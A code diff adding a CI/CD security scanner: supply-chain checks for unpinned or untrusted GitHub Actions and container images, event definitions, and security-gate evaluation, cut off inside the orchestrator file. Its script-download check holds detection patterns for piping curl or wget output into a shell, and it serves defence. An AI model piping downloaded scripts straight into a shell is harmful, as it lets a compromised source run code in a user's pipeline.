+  ]
+
+  /**
+   * Check supply chain security of a pipeline
+   */
+  export function check(
+    pipeline: CICDTypes.PipelineConfig,
+    options: SupplyChainCheckOptions = {}
+  ): SupplyChainCheckResult {
+    const findings: CICDTypes.CICDFinding[] = []
+    let unpinnedActions = 0
+    let untrustedActions = 0
+
+    const trustedPrefixes = options.trustedPrefixes || CICDTypes.TRUSTED_ACTION_PREFIXES
+    const blocklist = new Set(options.blocklist || [])
+
+    // Analyze each action reference
+    for (const action of pipeline.actions) {
+      // Check blocklist
+      if (blocklist.has(action.name) || blocklist.has(action.name.split("@")[0])) {
+        findings.push({
+          id: generateFindingId(),
+          category: "supply-chain",
+          severity: "critical",
+          title: "Blocklisted Action",
+          description: `Action '${action.name}' is on the blocklist and should not be used.`,
+          file: action.file,
+          line: action.line,
+          pipeline: pipeline.name,
+          remediation: "Remove or replace this action with an approved alternative.",
+          references: [],
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+        continue
+      }
+
+      // Check if action is pinned
+      if (!action.pinned) {
+        unpinnedActions++
+
+        const isCritical = CRITICAL_ACTIONS.some((ca) =>
+          action.name.toLowerCase().startsWith(ca.toLowerCase())
+        )
+
+        findings.push({
+          id: generateFindingId(),
+          category: "supply-chain",
+          severity: isCritical ? "high" : "medium",
+          title: `Unpinned Action: ${action.name}`,
+          description: `Action '${action.name}@${action.version || "latest"}' is not pinned to a specific SHA. This allows the action maintainer to push malicious updates that will automatically run in your workflow.`,
+          file: action.file,
+          line: action.line,
+          pipeline: pipeline.name,
+          evidence: `uses: ${action.name}${action.version ? `@${action.version}` : ""}`,
+          remediation: getPinningRemediation(action),
+          references: [
+            "https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-third-party-actions",
+          ],
+          cwe: "CWE-829",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+      }
+
+      // Check if action is from a trusted source
+      const isTrusted = trustedPrefixes.some((prefix) =>
+        action.name.toLowerCase().startsWith(prefix.toLowerCase())
+      )
+
+      if (!isTrusted && !action.official) {
+        untrustedActions++
+
+        findings.push({
+          id: generateFindingId(),
+          category: "supply-chain",
+          severity: action.pinned ? "low" : "medium",
+          title: `Third-Party Action: ${action.name}`,
+          description: `Action '${action.name}' is from an untrusted third-party source. Third-party actions can contain malicious code that runs in your workflow context.`,
+          file: action.file,
+          line: action.line,
+          pipeline: pipeline.name,
+          evidence: `uses: ${action.name}${action.version ? `@${action.version}` : ""}`,
+          remediation: action.pinned
+            ? "Review the action source code and consider forking to your own organization."
+            : "Pin this action to a specific SHA after reviewing the source code.",
+          references: [
+            "https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-third-party-actions",
+          ],
+          cwe: "CWE-829",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+      }
+
+      // Check for known risky actions
+      const riskyAction = RISKY_ACTIONS.find((ra) =>
+        action.name.toLowerCase().startsWith(ra.name.toLowerCase())
+      )
+
+      if (riskyAction) {
+        findings.push({
+          id: generateFindingId(),
+          category: "supply-chain",
+          severity: "info",
+          title: `Action Requires Review: ${action.name}`,
+          description: `Action '${action.name}' has been flagged for review: ${riskyAction.reason}`,
+          file: action.file,
+          line: action.line,
+          pipeline: pipeline.name,
+          remediation: "Review the configuration and permissions of this action.",
+          references: [],
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+      }
+    }
+
+    // Check for script downloads (curl/wget piped to shell)
+    findings.push(...checkScriptDownloads(pipeline))
+
+    // Check for Docker image pulls without digests
+    findings.push(...checkDockerImages(pipeline))
+
+    return {
+      findings,
+      actionsAnalyzed: pipeline.actions.length,
+      unpinnedActions,
+      untrustedActions,
+    }
+  }
+
+  /**
+   * Check for dangerous script download patterns
+   */
+  function checkScriptDownloads(
+    pipeline: CICDTypes.PipelineConfig
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    const dangerousPatterns = [
+      { pattern: /curl\s+[^|]*\|\s*(?:bash|sh|zsh)/, name: "curl | bash" },
+      { pattern: /wget\s+[^|]*\|\s*(?:bash|sh|zsh)/, name: "wget | bash" },
+      { pattern: /curl\s+[^|]*\|\s*sudo\s+(?:bash|sh)/, name: "curl | sudo bash" },
+      { pattern: /curl\s+-[a-z]*s[a-z]*\s+[^|]*\|\s*(?:bash|sh)/, name: "curl -s | bash" },
+    ]
+
+    for (const job of pipeline.jobs) {
+      for (const step of job.steps) {
+        if (!step.command) continue
+
+        for (const { pattern, name } of dangerousPatterns) {
+          if (pattern.test(step.command)) {
+            findings.push({
+              id: generateFindingId(),
+              category: "supply-chain",
+              severity: "high",
+              title: `Insecure Script Download: ${name}`,
+              description: `Step '${step.name}' downloads and executes a remote script using ${name}. This pattern is vulnerable to MITM attacks and allows the script source to push malicious updates.`,
+              file: pipeline.path,
+              line: step.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              step: step.id,
+              evidence: step.command.slice(0, 200),
+              remediation: "Download the script first, verify its checksum, then execute it. Or better, use a package manager or GitHub Action for the tool.",
+              references: [
+                "https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/",
+              ],
+              cwe: "CWE-829",
+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Check for Docker images without digest pinning
+   */
+  function checkDockerImages(
+    pipeline: CICDTypes.PipelineConfig
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    for (const job of pipeline.jobs) {
+      if (!job.container) continue
+
+      // Check if the container image uses a digest
+      const hasDigest = job.container.includes("@sha256:")
+
+      if (!hasDigest) {
+        // Check if it's using :latest or no tag
+        const isLatest = !job.container.includes(":") ||
+                        job.container.endsWith(":latest")
+
+        findings.push({
+          id: generateFindingId(),
+          category: "supply-chain",
+          severity: isLatest ? "high" : "medium",
+          title: "Unpinned Container Image",
+          description: `Job '${job.id}' uses container image '${job.container}' without a digest pin. Container tags can be overwritten with malicious images.`,
+          file: pipeline.path,
+          line: job.line,
+          pipeline: pipeline.name,
+          job: job.id,
+          evidence: `container: ${job.container}`,
+          remediation: `Pin the container image to a specific digest:\ncontainer: ${job.container.split(":")[0]}@sha256:<digest>`,
+          references: [
+            "https://docs.docker.com/reference/cli/docker/image/pull/#pull-an-image-by-digest",
+          ],
+          cwe: "CWE-829",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+      }
+    }
+
+    // Also check for docker build/pull commands in steps
+    for (const job of pipeline.jobs) {
+      for (const step of job.steps) {
+        if (!step.command) continue
+
+        // Check for docker pull without digest
+        const dockerPullMatch = step.command.match(/docker\s+pull\s+([^\s]+)/)
+        if (dockerPullMatch) {
+          const image = dockerPullMatch[1]
+          if (!image.includes("@sha256:")) {
+            findings.push({
+              id: generateFindingId(),
+              category: "supply-chain",
+              severity: "medium",
+              title: "Unpinned Docker Pull",
+              description: `Step '${step.name}' pulls Docker image '${image}' without a digest pin.`,
+              file: pipeline.path,
+              line: step.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              step: step.id,
+              evidence: `docker pull ${image}`,
+              remediation: `Pin the image to a specific digest: docker pull ${image.split(":")[0]}@sha256:<digest>`,
+              references: [],
+              cwe: "CWE-829",
+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Get remediation for action pinning
+   */
+  function getPinningRemediation(action: CICDTypes.ActionReference): string {
+    const actionName = action.name
+    const version = action.version || "main"
+
+    return `Pin the action to a specific commit SHA:
+
+1. Find the commit SHA for ${version}:
+   gh api repos/${actionName}/commits/${version} --jq '.sha'
+
+2. Update the workflow:
+   uses: ${actionName}@<full-sha>  # ${version}
+
+Or use a tool like github-actions-pinning to automatically pin actions.`
+  }
+
+  /**
+   * Generate unique finding ID
+   */
+  function generateFindingId(): string {
+    return `sc_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /**
+   * Check for OIDC misconfigurations
+   */
+  export function checkOIDC(
+    pipeline: CICDTypes.PipelineConfig
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    // Check if id-token permission is granted
+    const hasIdToken = pipeline.permissions.some(
+      (p) => p.resource === "id-token" && p.scope === "write"
+    ) || pipeline.jobs.some((j) =>
+      j.permissions.some((p) => p.resource === "id-token" && p.scope === "write")
+    )
+
+    if (!hasIdToken) return findings
+
+    // Check for common OIDC misconfigurations
+    const content = pipeline.raw || ""
+
+    // Check for overly permissive AWS role trust policy patterns
+    if (content.includes("aws-actions/configure-aws-credentials")) {
+      // Look for missing audience restriction
+      if (!content.includes("audience:") && !content.includes("web-identity-token-file")) {
+        findings.push({
+          id: generateFindingId(),
+          category: "supply-chain",
+          severity: "medium",
+          title: "AWS OIDC Configuration Review",
+          description: "Workflow uses AWS OIDC authentication. Ensure the AWS IAM role trust policy restricts the subject claim to specific repositories and branches.",
+          file: pipeline.path,
+          pipeline: pipeline.name,
+          remediation: "Configure the AWS IAM role trust policy to restrict the 'sub' claim to specific repos/branches:\n\"Condition\": {\n  \"StringEquals\": {\n    \"token.actions.githubusercontent.com:sub\": \"repo:owner/repo:ref:refs/heads/main\"\n  }\n}",
+          references: [
+            "https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services",
+          ],
+          cwe: "CWE-284",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+      }
+    }
+
+    return findings
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/events.ts b/packages/opencode/src/pentest/cicd/events.ts
new file mode 100644
index 00000000000..d59aef71a2d
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/events.ts
@@ -0,0 +1,238 @@
+/**
+ * @fileoverview CI/CD Security Scanner Events
+ *
+ * Bus event definitions for CI/CD pipeline security scanning.
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+import { CICDTypes } from "./types"
+
+export namespace CICDEvents {
+  // ===== DISCOVERY EVENTS =====
+
+  /** Emitted when pipeline discovery starts */
+  export const DiscoveryStarted = BusEvent.define(
+    "pentest.cicd.discovery_started",
+    z.object({
+      target: z.string(),
+      providers: z.array(CICDTypes.Provider),
+    })
+  )
+
+  /** Emitted when a pipeline config file is found */
+  export const PipelineDiscovered = BusEvent.define(
+    "pentest.cicd.pipeline_discovered",
+    z.object({
+      target: z.string(),
+      provider: CICDTypes.Provider,
+      path: z.string(),
+      name: z.string(),
+    })
+  )
+
+  /** Emitted when pipeline discovery completes */
+  export const DiscoveryCompleted = BusEvent.define(
+    "pentest.cicd.discovery_completed",
+    z.object({
+      target: z.string(),
+      pipelinesFound: z.number(),
+      providers: z.record(z.string(), z.number()),
+      duration: z.number(),
+    })
+  )
+
+  // ===== SCAN EVENTS =====
+
+  /** Emitted when a CI/CD scan starts */
+  export const ScanStarted = BusEvent.define(
+    "pentest.cicd.scan_started",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: CICDTypes.ProfileId,
+      pipelineCount: z.number(),
+    })
+  )
+
+  /** Emitted when a pipeline is being analyzed */
+  export const PipelineAnalyzing = BusEvent.define(
+    "pentest.cicd.pipeline_analyzing",
+    z.object({
+      scanID: z.string(),
+      provider: CICDTypes.Provider,
+      path: z.string(),
+      name: z.string(),
+    })
+  )
+
+  /** Emitted when a pipeline analysis completes */
+  export const PipelineAnalyzed = BusEvent.define(
+    "pentest.cicd.pipeline_analyzed",
+    z.object({
+      scanID: z.string(),
+      provider: CICDTypes.Provider,
+      path: z.string(),
+      name: z.string(),
+      jobCount: z.number(),
+      stepCount: z.number(),
+      findingsCount: z.number(),
+    })
+  )
+
+  /** Emitted when a scan completes */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.cicd.scan_completed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: CICDTypes.ProfileId,
+      pipelinesScanned: z.number(),
+      findingsCount: z.number(),
+      criticalCount: z.number(),
+      highCount: z.number(),
+      gateStatus: CICDTypes.GateStatus.optional(),
+      duration: z.number(),
+      status: z.enum(["completed", "stopped", "partial"]),
+    })
+  )
+
+  /** Emitted when a scan fails */
+  export const ScanFailed = BusEvent.define(
+    "pentest.cicd.scan_failed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      error: z.string(),
+      phase: z.string().optional(),
+    })
+  )
+
+  // ===== FINDING EVENTS =====
+
+  /** Emitted when a secret is detected */
+  export const SecretDetected = BusEvent.define(
+    "pentest.cicd.secret_detected",
+    z.object({
+      scanID: z.string(),
+      file: z.string(),
+      line: z.number(),
+      patternName: z.string(),
+      severity: CICDTypes.Severity,
+      redacted: z.string(),
+    })
+  )
+
+  /** Emitted when a permission issue is found */
+  export const PermissionIssue = BusEvent.define(
+    "pentest.cicd.permission_issue",
+    z.object({
+      scanID: z.string(),
+      file: z.string(),
+      resource: z.string(),
+      scope: CICDTypes.PermissionScope,
+      severity: CICDTypes.Severity,
+      reason: z.string(),
+    })
+  )
+
+  /** Emitted when an injection risk is found */
+  export const InjectionRisk = BusEvent.define(
+    "pentest.cicd.injection_risk",
+    z.object({
+      scanID: z.string(),
+      file: z.string(),
+      line: z.number(),
+      type: z.string(),
+      source: z.string(),
+      severity: CICDTypes.Severity,
+    })
+  )
+
+  /** Emitted when a supply chain issue is found */
+  export const SupplyChainIssue = BusEvent.define(
+    "pentest.cicd.supply_chain_issue",
+    z.object({
+      scanID: z.string(),
+      file: z.string(),
+      action: z.string(),
+      type: z.string(),
+      severity: CICDTypes.Severity,
+      recommendation: z.string(),
+    })
+  )
+
+  /** Emitted when any finding is created */
+  export const FindingCreated = BusEvent.define(
+    "pentest.cicd.finding_created",
+    z.object({
+      scanID: z.string(),
+      findingID: z.string(),
+      category: CICDTypes.FindingCategory,
+      severity: CICDTypes.Severity,
+      title: z.string(),
+      file: z.string(),
+      line: z.number().optional(),
+    })
+  )
+
+  // ===== SAST EVENTS =====
+
+  /** Emitted when SAST analysis starts */
+  export const SASTStarted = BusEvent.define(
+    "pentest.cicd.sast_started",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      tools: z.array(CICDTypes.SASTTool),
+    })
+  )
+
+  /** Emitted when a SAST tool completes */
+  export const SASTToolCompleted = BusEvent.define(
+    "pentest.cicd.sast_tool_completed",
+    z.object({
+      scanID: z.string(),
+      tool: CICDTypes.SASTTool,
+      findingsCount: z.number(),
+      duration: z.number(),
+    })
+  )
+
+  /** Emitted when SAST analysis completes */
+  export const SASTCompleted = BusEvent.define(
+    "pentest.cicd.sast_completed",
+    z.object({
+      scanID: z.string(),
+      totalFindings: z.number(),
+      byTool: z.record(z.string(), z.number()),
+      duration: z.number(),
+    })
+  )
+
+  // ===== GATE EVENTS =====
+
+  /** Emitted when security gate evaluation starts */
+  export const GateEvaluating = BusEvent.define(
+    "pentest.cicd.gate_evaluating",
+    z.object({
+      scanID: z.string(),
+      findingsCount: z.number(),
+      rulesCount: z.number(),
+    })
+  )
+
+  /** Emitted when security gate evaluation completes */
+  export const GateEvaluated = BusEvent.define(
+    "pentest.cicd.gate_evaluated",
+    z.object({
+      scanID: z.string(),
+      status: CICDTypes.GateStatus,
+      passed: z.boolean(),
+      rulesPassed: z.number(),
+      rulesFailed: z.number(),
+      rulesWarned: z.number(),
+      message: z.string(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/cicd/gates.ts b/packages/opencode/src/pentest/cicd/gates.ts
new file mode 100644
index 00000000000..3d39fd19b5c
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/gates.ts
@@ -0,0 +1,431 @@
+/**
+ * @fileoverview CI/CD Security Gate Enforcement
+ *
+ * Evaluates scan results against security policies to determine
+ * pass/fail/warn status for CI/CD pipeline security gates.
+ */
+
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+import { CICDTypes } from "./types"
+import { CICDEvents } from "./events"
+import { CICDProfiles } from "./profiles"
+
+const log = Log.create({ name: "cicd-gates" })
+
+/** Gate evaluation options */
+export interface GateEvaluationOptions {
+  /** Custom gate configuration */
+  config?: CICDTypes.GateConfig
+  /** Scan ID for event tracking */
+  scanId?: string
+  /** Include suppressed findings */
+  includeSuppressed?: boolean
+}
+
+export namespace SecurityGates {
+  /**
+   * Evaluate findings against security gate rules
+   */
+  export async function evaluate(
+    findings: CICDTypes.CICDFinding[],
+    options: GateEvaluationOptions = {}
+  ): Promise<CICDTypes.GateResult> {
+    const config = options.config || CICDProfiles.DefaultGateConfig
+    const startTime = Date.now()
+
+    if (!config.enabled) {
+      return {
+        status: "skip",
+        passed: true,
+        message: "Security gate is disabled",
+        rulesEvaluated: 0,
+        rulesPassed: 0,
+        rulesFailed: 0,
+        rulesWarned: 0,
+        details: [],
+        evaluatedAt: Date.now(),
+      }
+    }
+
+    // Filter out suppressed findings if not including them
+    const activeFindings = options.includeSuppressed
+      ? findings
+      : findings.filter((f) => !f.suppressed && !f.falsePositive)
+
+    log.info("Evaluating security gate", {
+      findingsCount: activeFindings.length,
+      rulesCount: config.rules.length,
+    })
+
+    // Emit evaluation start event
+    if (options.scanId) {
+      await Bus.publish(CICDEvents.GateEvaluating, {
+        scanID: options.scanId,
+        findingsCount: activeFindings.length,
+        rulesCount: config.rules.length + 4, // +4 for threshold rules
+      })
+    }
+
+    const details: CICDTypes.GateResult["details"] = []
+    let rulesPassed = 0
+    let rulesFailed = 0
+    let rulesWarned = 0
+
+    // Count findings by severity
+    const severityCounts = countBySeverity(activeFindings)
+
+    // Evaluate threshold rules
+    const thresholdResults = evaluateThresholds(severityCounts, config)
+    details.push(...thresholdResults.details)
+    rulesPassed += thresholdResults.passed
+    rulesFailed += thresholdResults.failed
+    rulesWarned += thresholdResults.warned
+
+    // Evaluate custom rules
+    for (const rule of config.rules) {
+      const result = evaluateRule(rule, activeFindings)
+      details.push(result)
+
+      switch (result.status) {
+        case "pass":
+          rulesPassed++
+          break
+        case "fail":
+          rulesFailed++
+          break
+        case "warn":
+          rulesWarned++
+          break
+      }
+    }
+
+    // Determine overall status
+    const status = determineStatus(rulesFailed, rulesWarned)
+    const passed = status === "pass"
+    const message = generateMessage(status, rulesFailed, rulesWarned, severityCounts)
+
+    const result: CICDTypes.GateResult = {
+      status,
+      passed,
+      message,
+      rulesEvaluated: details.length,
+      rulesPassed,
+      rulesFailed,
+      rulesWarned,
+      details,
+      evaluatedAt: Date.now(),
+    }
+
+    // Emit evaluation complete event
+    if (options.scanId) {
+      await Bus.publish(CICDEvents.GateEvaluated, {
+        scanID: options.scanId,
+        status,
+        passed,
+        rulesPassed,
+        rulesFailed,
+        rulesWarned,
+        message,
+      })
+    }
+
+    log.info("Security gate evaluation complete", {
+      status,
+      passed,
+      duration: Date.now() - startTime,
+    })
+
+    return result
+  }
+
+  /**
+   * Count findings by severity
+   */
+  function countBySeverity(
+    findings: CICDTypes.CICDFinding[]
+  ): Record<CICDTypes.Severity, number> {
+    const counts: Record<CICDTypes.Severity, number> = {
+      critical: 0,
+      high: 0,
+      medium: 0,
+      low: 0,
+      info: 0,
+    }
+
+    for (const finding of findings) {
+      counts[finding.severity]++
+    }
+
+    return counts
+  }
+
+  /**
+   * Evaluate severity threshold rules
+   */
+  function evaluateThresholds(
+    counts: Record<CICDTypes.Severity, number>,
+    config: CICDTypes.GateConfig
+  ): { details: CICDTypes.GateResult["details"]; passed: number; failed: number; warned: number } {
+    const details: CICDTypes.GateResult["details"] = []
+    let passed = 0
+    let failed = 0
+    let warned = 0
+
+    // Critical threshold
+    if (config.blockOnCritical && counts.critical > 0) {
+      details.push({
+        ruleId: "threshold-critical",
+        status: "fail",
+        message: `Found ${counts.critical} critical finding(s), blocking on any critical`,
+        findings: counts.critical,
+      })
+      failed++
+    } else if (counts.critical > config.maxCritical) {
+      details.push({
+        ruleId: "threshold-critical",
+        status: "fail",
+        message: `Found ${counts.critical} critical finding(s), exceeds max of ${config.maxCritical}`,
+        findings: counts.critical,
+      })
+      failed++
+    } else {
+      details.push({
+        ruleId: "threshold-critical",
+        status: "pass",
+        message: `Critical findings (${counts.critical}) within threshold (${config.maxCritical})`,
+        findings: counts.critical,
+      })
+      passed++
+    }
+
+    // High threshold
+    if (config.blockOnHigh && counts.high > 0) {
+      details.push({
+        ruleId: "threshold-high",
+        status: "fail",
+        message: `Found ${counts.high} high finding(s), blocking on any high`,
+        findings: counts.high,
+      })
+      failed++
+    } else if (counts.high > config.maxHigh) {
+      details.push({
+        ruleId: "threshold-high",
+        status: "warn",
+        message: `Found ${counts.high} high finding(s), exceeds max of ${config.maxHigh}`,
+        findings: counts.high,
+      })
+      warned++
+    } else {
+      details.push({
+        ruleId: "threshold-high",
+        status: "pass",
+        message: `High findings (${counts.high}) within threshold (${config.maxHigh})`,
+        findings: counts.high,
+      })
+      passed++
+    }
+
+    // Medium threshold
+    if (counts.medium > config.maxMedium) {
+      details.push({
+        ruleId: "threshold-medium",
+        status: "warn",
+        message: `Found ${counts.medium} medium finding(s), exceeds max of ${config.maxMedium}`,
+        findings: counts.medium,
+      })
+      warned++
+    } else {
+      details.push({
+        ruleId: "threshold-medium",
+        status: "pass",
+        message: `Medium findings (${counts.medium}) within threshold (${config.maxMedium})`,
+        findings: counts.medium,
+      })
+      passed++
+    }
+
+    // Low threshold
+    if (counts.low > config.maxLow) {
+      details.push({
+        ruleId: "threshold-low",
+        status: "warn",
+        message: `Found ${counts.low} low finding(s), exceeds max of ${config.maxLow}`,
+        findings: counts.low,
+      })
+      warned++
+    } else {
+      details.push({
+        ruleId: "threshold-low",
+        status: "pass",
+        message: `Low findings (${counts.low}) within threshold (${config.maxLow})`,
+        findings: counts.low,
+      })
+      passed++
+    }
+
+    return { details, passed, failed, warned }
+  }
+
+  /**
+   * Evaluate a single gate rule
+   */
+  function evaluateRule(
+    rule: CICDTypes.GateRule,
+    findings: CICDTypes.CICDFinding[]
+  ): CICDTypes.GateResult["details"][0] {
+    // Filter findings that match this rule
+    let matchingFindings = findings
+
+    if (rule.category) {
+      matchingFindings = matchingFindings.filter((f) => f.category === rule.category)
+    }
+
+    if (rule.severity) {
+      matchingFindings = matchingFindings.filter((f) => f.severity === rule.severity)
+    }
+
+    const count = matchingFindings.length
+    const threshold = rule.threshold ?? 0
+
+    // Determine status based on action
+    if (count > threshold) {
+      if (rule.action === "fail") {
+        return {
+          ruleId: rule.id,
+          status: "fail",
+          message: rule.description || `Rule '${rule.id}' failed: ${count} finding(s) exceed threshold of ${threshold}`,
+          findings: count,
+        }
+      } else if (rule.action === "warn") {
+        return {
+          ruleId: rule.id,
+          status: "warn",
+          message: rule.description || `Rule '${rule.id}' warning: ${count} finding(s) exceed threshold of ${threshold}`,
+          findings: count,
+        }
+      }
+    }
+
+    return {
+      ruleId: rule.id,
+      status: "pass",
+      message: `Rule '${rule.id}' passed: ${count} finding(s) within threshold of ${threshold}`,
+      findings: count,
+    }
+  }
+
+  /**
+   * Determine overall gate status
+   */
+  function determineStatus(failed: number, warned: number): CICDTypes.GateStatus {
+    if (failed > 0) {
+      return "fail"
+    }
+    if (warned > 0) {
+      return "warn"
+    }
+    return "pass"
+  }
+
+  /**
+   * Generate human-readable status message
+   */
+  function generateMessage(
+    status: CICDTypes.GateStatus,
+    failed: number,
+    warned: number,
+    counts: Record<CICDTypes.Severity, number>
+  ): string {
+    const total = Object.values(counts).reduce((a, b) => a + b, 0)
+
+    if (status === "pass") {
+      if (total === 0) {
+        return "Security gate passed: No findings detected"
+      }
+      return `Security gate passed: ${total} finding(s) within acceptable thresholds`
+    }
+
+    if (status === "warn") {
+      return `Security gate warning: ${warned} rule(s) exceeded thresholds (${counts.critical} critical, ${counts.high} high, ${counts.medium} medium)`
+    }
+
+    return `Security gate failed: ${failed} rule(s) violated (${counts.critical} critical, ${counts.high} high findings)`
+  }
+
+  /**
+   * Create a custom gate configuration
+   */
+  export function createConfig(overrides: Partial<CICDTypes.GateConfig>): CICDTypes.GateConfig {
+    return {
+      ...CICDProfiles.DefaultGateConfig,
+      ...overrides,
+      rules: [
+        ...(CICDProfiles.DefaultGateConfig.rules || []),
+        ...(overrides.rules || []),
+      ],
+    }
+  }
+
+  /**
+   * Format gate result for display
+   */
+  export function formatResult(result: CICDTypes.GateResult): string {
+    const lines: string[] = []
+    const statusEmoji = {
+      pass: "✓",
+      fail: "✗",
+      warn: "⚠",
+      skip: "○",
+    }
+
+    lines.push(`Security Gate: ${statusEmoji[result.status]} ${result.status.toUpperCase()}`)
+    lines.push(`${result.message}`)
+    lines.push("")
+    lines.push("Rule Evaluation:")
+    lines.push(`  Passed: ${result.rulesPassed}`)
+    lines.push(`  Failed: ${result.rulesFailed}`)
+    lines.push(`  Warnings: ${result.rulesWarned}`)
+    lines.push("")
+
+    if (result.details.length > 0) {
+      lines.push("Details:")
+      for (const detail of result.details) {
+        const emoji = statusEmoji[detail.status]
+        lines.push(`  ${emoji} ${detail.ruleId}: ${detail.message}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Check if a single finding would fail the gate
+   */
+  export function wouldFailGate(
+    finding: CICDTypes.CICDFinding,
+    config: CICDTypes.GateConfig = CICDProfiles.DefaultGateConfig
+  ): boolean {
+    // Check severity thresholds
+    if (config.blockOnCritical && finding.severity === "critical") {
+      return true
+    }
+    if (config.blockOnHigh && finding.severity === "high") {
+      return true
+    }
+
+    // Check custom rules
+    for (const rule of config.rules) {
+      if (rule.action !== "fail") continue
+
+      const matchesCategory = !rule.category || rule.category === finding.category
+      const matchesSeverity = !rule.severity || rule.severity === finding.severity
+
+      if (matchesCategory && matchesSeverity) {
+        return true
+      }
+    }
+
+    return false
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/index.ts b/packages/opencode/src/pentest/cicd/index.ts
new file mode 100644
index 00000000000..bb864c703c2
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/index.ts
@@ -0,0 +1,51 @@
+/**
+ * @fileoverview CI/CD Security Scanner Module
+ *
+ * Comprehensive CI/CD pipeline security scanning with support for
+ * GitHub Actions, GitLab CI, and Jenkins pipelines.
+ *
+ * ## Features
+ *
+ * - **Pipeline Discovery**: Auto-discover CI/CD configs across providers
+ * - **Secret Detection**: Find hardcoded secrets with regex + entropy
+ * - **Permission Analysis**: Check for overly permissive configurations
+ * - **Injection Detection**: Identify command injection vulnerabilities
+ * - **Supply Chain Security**: Unpinned actions, untrusted dependencies
+ * - **SAST Integration**: Semgrep and Gitleaks support
+ * - **Security Gates**: Configurable pass/fail criteria
+ *
+ * @module pentest/cicd
+ */
+
+// Types and schemas
+export { CICDTypes } from "./types"
+
+// Events
+export { CICDEvents } from "./events"
+
+// Storage
+export { CICDStorage } from "./storage"
+export type { StorageConfig } from "./storage"
+
+// Profiles
+export { CICDProfiles } from "./profiles"
+
+// Orchestrator
+export { CICDOrchestrator } from "./orchestrator"
+export type { OrchestratorOptions, DiscoveryResult } from "./orchestrator"
+
+// Gates
+export { SecurityGates } from "./gates"
+export type { GateEvaluationOptions } from "./gates"
+
+// Tool
+export { CICDTool } from "./tool"
+
+// Providers
+export * from "./providers"
+
+// Security checks
+export * from "./checks"
+
+// SAST integration
+export * from "./sast"
diff --git a/packages/opencode/src/pentest/cicd/orchestrator.ts b/packages/opencode/src/pentest/cicd/orchestrator.ts
new file mode 100644
index 00000000000..cd39acdb897
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/orchestrator.ts
@@ -0,0 +1,487 @@
+/**
+ * @fileoverview CI/CD Security Scan Orchestrator
+ *
+ * Main scan coordination for CI/CD pipeline security analysis.
+ * Discovers pipelines, runs security checks, SAST tools, and gate evaluation.
+ */
+
+import { promises as fs } from "fs"
+import * as path from "path"
+import { glob } from "glob"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+import { CICDTypes } from "./types"
+import { CICDEvents } from "./events"
+import { CICDStorage } from "./storage"
+import type { StorageConfig } from "./storage"
+import { CICDProfiles } from "./profiles"
+import { getProvider, getImplementedProviders } from "./providers"
+import { runChecks } from "./checks"
+import type { CheckOptions } from "./checks"
+import { SASTOrchestrator } from "./sast"
+import type { SASTOrchestrationOptions } from "./sast"
+import { SecurityGates } from "./gates"
+
+const log = Log.create({ name: "cicd-orchestrator" })
+
+/** Orchestrator options */
+export interface OrchestratorOptions {
+  /** Scan profile to use */
+  profile?: CICDTypes.ProfileId
+  /** Custom profile overrides */
+  customProfile?: Partial<CICDTypes.ScanProfile>
+  /** Specific providers to scan */
+  providers?: CICDTypes.Provider[]
+  /** Check options */
+  checkOptions?: CheckOptions
+  /** SAST options */
+  sastOptions?: Partial<SASTOrchestrationOptions>
+  /** Gate configuration */
+  gateConfig?: CICDTypes.GateConfig
+  /** Storage configuration */
+  storageConfig?: StorageConfig
+  /** Overall timeout */
+  timeout?: number
+}
+
+/** Discovery result */
+export interface DiscoveryResult {
+  pipelines: CICDTypes.PipelineConfig[]
+  providers: Partial<Record<CICDTypes.Provider, number>>
+  errors: string[]
+}
+
+export namespace CICDOrchestrator {
+  /**
+   * Discover CI/CD pipelines in a target directory
+   */
+  export async function discover(
+    target: string,
+    providers?: CICDTypes.Provider[]
+  ): Promise<DiscoveryResult> {
+    const pipelines: CICDTypes.PipelineConfig[] = []
+    const providerCounts: Partial<Record<CICDTypes.Provider, number>> = {}
+    const errors: string[] = []
+
+    log.info("Discovering CI/CD pipelines", { target })
+
+    const targetProviders = providers
+      ? getImplementedProviders().filter((p) => providers.includes(p.provider))
+      : getImplementedProviders()
+
+    await Bus.publish(CICDEvents.DiscoveryStarted, {
+      target,
